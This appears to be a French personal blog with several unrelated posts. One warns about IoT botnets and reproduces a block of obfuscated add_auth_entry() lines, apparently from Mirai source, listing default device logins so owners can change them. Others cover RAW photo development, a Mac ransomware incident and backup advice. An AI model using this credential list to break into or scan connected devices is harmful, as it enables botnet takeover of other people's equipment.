Remerciements à Roland et l’association AMIFORT de Veckring.

Internet n’a plus rien à voir avec ses objectifs et débuts, tant par son infrastructure que par son contenu.
Le réseau a été fragilisé par d’inquiétants goulets d’étranglements (contrôles sécuritaires des gouvernements notamment) et scabreux empilages propriétaires (la palme revenant à Facebook évidemment).

Mais il est hors de question de cautionner les attaques qui se multiplient, qui sont autant d’évaluations et préparatifs au black out.

Le listing ci-dessous dresse tous les couples compte/mot de passe recherchés par les botnets utilisés lors des attaques. N’importe quel objet connecté est susceptible d’être impliqué. Il appartient à chacun de les changer au plus vite le cas échéant.

Je réitère plus que jamais mes conseils de sauvegardes locales filaires, l’une d’entre elles étant transportable et stockée dans un endroit sûr.

add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9); // root vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8); // root admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin
add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6); // root 888888
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5); // root xmhdipc
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5); // root default
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5); // root juantech
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5); // root 123456
add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5); // root 54321
add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5); // support support
add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none)
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4); // admin password
add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4); // root root
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4); // root 12345
add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3); // user user
add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3); // admin (none)
add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3); // root pass
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3); // admin admin1234
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x13\x13\x13", 3); // root 1111
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x51\x4F\x41\x43\x46\x4F\x4B\x4C", 3); // admin smcadmin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13", 2); // admin 1111
add_auth_entry("\x50\x4D\x4D\x56", "\x14\x14\x14\x14\x14\x14", 2); // root 666666
add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51\x55\x4D\x50\x46", 2); // root password
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16", 2); // root 1234
add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11", 1); // root klv123
add_auth_entry("\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x4F\x47\x4B\x4C\x51\x4F", 1); // Administrator admin
add_auth_entry("\x51\x47\x50\x54\x4B\x41\x47", "\x51\x47\x50\x54\x4B\x41\x47", 1); // service service
add_auth_entry("\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", "\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", 1); // supervisor supervisor
add_auth_entry("\x45\x57\x47\x51\x56", "\x45\x57\x47\x51\x56", 1); // guest guest
add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
add_auth_entry("\x43\x46\x4F\x4B\x4C\x13", "\x52\x43\x51\x51\x55\x4D\x50\x46", 1); // admin1 password
add_auth_entry("\x43\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x13\x10\x11\x16", 1); // administrator 1234
add_auth_entry("\x14\x14\x14\x14\x14\x14", "\x14\x14\x14\x14\x14\x14", 1); // 666666 666666
add_auth_entry("\x1A\x1A\x1A\x1A\x1A\x1A", "\x1A\x1A\x1A\x1A\x1A\x1A", 1); // 888888 888888
add_auth_entry("\x57\x40\x4C\x56", "\x57\x40\x4C\x56", 1); // ubnt ubnt
add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11\x16", 1); // root klv1234
add_auth_entry("\x50\x4D\x4D\x56", "\x78\x56\x47\x17\x10\x13", 1); // root Zte521
add_auth_entry("\x50\x4D\x4D\x56", "\x4A\x4B\x11\x17\x13\x1A", 1); // root hi3518
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x54\x40\x58\x46", 1); // root jvbzd
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x4C\x49\x4D", 4); // root anko
add_auth_entry("\x50\x4D\x4D\x56", "\x58\x4E\x5A\x5A\x0C", 1); // root zlxx.
add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x54\x4B\x58\x5A\x54", 1); // root 7ujMko0vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // root 7ujMko0admin
add_auth_entry("\x50\x4D\x4D\x56", "\x51\x5B\x51\x56\x47\x4F", 1); // root system
add_auth_entry("\x50\x4D\x4D\x56", "\x4B\x49\x55\x40", 1); // root ikwb
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x50\x47\x43\x4F\x40\x4D\x5A", 1); // root dreambox
add_auth_entry("\x50\x4D\x4D\x56", "\x57\x51\x47\x50", 1); // root user
add_auth_entry("\x50\x4D\x4D\x56", "\x50\x47\x43\x4E\x56\x47\x49", 1); // root realtek
add_auth_entry("\x50\x4D\x4D\x56", "\x12\x12\x12\x12\x12\x12\x12\x12", 1); // root 00000000
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13\x13\x13\x13", 1); // admin 1111111
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16", 1); // admin 1234
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17", 1); // admin 12345
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x17\x16\x11\x10\x13", 1); // admin 54321
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17\x14", 1); // admin 123456
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // admin 7ujMko0admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x16\x11\x10\x13", 1); // admin 1234
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51", 1); // admin pass
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x4F\x47\x4B\x4C\x51\x4F", 1); // admin meinsm
add_auth_entry("\x56\x47\x41\x4A", "\x56\x47\x41\x4A", 1); // tech tech
add_auth_entry("\x4F\x4D\x56\x4A\x47\x50", "\x44\x57\x41\x49\x47\x50", 1); // mother fucker

Tous les algorithmes et donc les rendus sont possibles sur des fichiers RAW. Les possibilités créatives sont infinies, sans aucun surcoût. La maîtrise de la chaîne graphique assure un rendu papier identique à celui obtenu à l’écran. A l’heure où toute une génération cédant à la mode « vintage » se colle aux couteux développements Polaroïd et des vieux argentiques, les outils modernes continuent de progresser, de plus en plus vite je trouve… pour la génération suivante?

L’image ci-dessous est une image RAW non dématricée, c’est à dire telle que capturée par un appareil photo numérique.
La pervasive soucoupe de Buzludzha s’est imposée logiquement devant l’étrangeté de l’image.
RAW… Rhooo.. mais ce n’est pas beau !

Une image brute est en effet verdâtre, car la matrice de Bayer (1976) a 2 fois plus de photosites sensibles au vert qu’au rouge et au bleu… tout comme les cônes de l’oeil humain.
Elle est très sombre, car le blanc a 2048 nuances, dont beaucoup font « clignoter » le dos de l’appareil pour cause de surexposition dans ce qui est un rendu jpeg. Elle présente un cadre noir (non reproduit ici) pour ses métadonnées.

On comprend que son développement (interprétation et potentiel) peut énormément varier d’un logiciel à l’autre et d’un espace colorimétrique à l’autre.




La même photo dans son intégralité, prise sans filtre optique, rendue en jpeg en utilisant toutes les informations des pixels 2 par 2 à leur maximum :w

Il a neigé toute la matinée, on se fait rançonner par internet… et Pixel traine encore au lit à midi ?

Les cas de Ransomware se multiplient de façon inquiétante sur PC, mais aussi sur Mac.
C’est logique, pourquoi juste casser (et enrichir les éditeurs d’antivirus) alors que l’on peut voler?

Concrètement, il s’agit le plus souvent d’une pièce jointe à un mail au format word, excel, powerpoint ou pdf d’un expéditeur inconnu.
En l’ouvrant, un script caché crypte discrètement les données personnelles de la victime.
Après 3 jours, l’essentiel des dommages étant réalisé, une demande de rançon s’affiche pour pouvoir à nouveau accéder à ses données (en général 400$ en bitcoins).

Aucun mot de passe administrateur n’est demandé.
C’est logique, car le système n’est pas attaqué et un utilisateur a le droit de faire ce qu’il veut de ses données, y compris de les crypter.
Sauf qu’il n’a rien demandé et qu’il ne connaît pas la clé pour décrypter !

Une étape supplémentaire a été franchie le 04/03/16, ce qui explique les 100 emails par heure ce matin.
Un ransomware a été implanté dans une mise à jour légale d’un logiciel connu sur le propre site de son éditeur.
C’était une simple mise à jour par glisser-déposer de l’application (comme on le fait depuis toujours sous mac), donc sans mot de passe administrateur demandé.

Les développeurs étant officiellement enregistrés chez Apple, la sécurité intégrée (Gatekeeper) ne s’est pas déclenchée.
L’attaque n’étant pas connue par cette voie, l’antivirus intégré (X Protect) n’a rien décelé.
Apple a fait au plus vite (mise à jour X Protect, certificat des développeurs révoqué), mais ce qui avait déjà été crypté est définitivement perdu.
En effet, il sera inutile de payer ce soir, les escrocs n’envoient aucune clé.. puisque ce sont des escrocs !

Le ransomware est potentiellement dans d’autres applications.
Il y en aura beaucoup d’autres tous les jours pour passer outre les protections antivirus.

Le risque est majeur sur les applications obtenues illégalement.
Le critère du mot de passe administrateur est insuffisant pour garantir la sécurité de ses données.
Les sauvegardes et tous les supports connectés en filaire ou pas à l’ordinateur peuvent être potentiellement touchés.

Je continue à recommander plus que jamais en plus de TimeMachine, des sauvegardes locales, périodiques, sur des disques durs qui doivent ensuite être détachés et stockés loin de l’ordinateur.

Panoramique (doit mieux rendre en photo de 2m de long qu’en 1000px ;)


Vue classique du portique japonais (volontairement laissé sombre, sans lightpainting caricatural, sinon c’est coloré mais plus zen du tout)


Règle des tiers sur les bâtiments (par esprit contestataire) et herbe au premier plan (pour allonger le portique).

Les lightbursts sont créés par l’objectif fermé à f11 et apparaissent donc au dessus du portique.
L’objectif choisi a un nombre impair de lamelles (9) donc 9*2 soit 18 rayons lumineux.